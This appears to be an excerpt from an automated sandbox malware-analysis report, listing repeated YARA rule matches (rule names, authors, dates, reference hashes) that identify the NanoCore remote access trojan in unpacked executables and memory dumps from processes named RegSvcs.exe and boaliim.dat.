Source: 13.2.RegSvcs.exe.7a90000.21.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7a90000.21.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7a90000.21.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.6e80000.19.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.6e80000.19.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.6e80000.19.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.6e80000.19.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.37f43e4.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.37f43e4.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.37f43e4.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.37f43e4.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.5f60000.15.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.5f60000.15.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.5f60000.15.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.5f60000.15.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7b34c9f.30.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b34c9f.30.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b34c9f.30.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7b34c9f.30.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.3850378.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.3850378.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.3850378.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.3850378.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.37f9244.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.37f9244.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.3850378.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.37f9244.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.37f9244.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7b30000.29.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b30000.29.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b30000.29.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7b30000.29.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4b0f50d.12.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4b0f50d.12.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.4b0f50d.12.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.385c5c0.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.385c5c0.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.385c5c0.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.385c5c0.4.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.385c5c0.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4b032d9.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4b032d9.9.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.4b032d9.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4b23b3a.13.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4b23b3a.13.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.4b23b3a.13.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.651409238.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651409238.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651409238.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.651409238.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
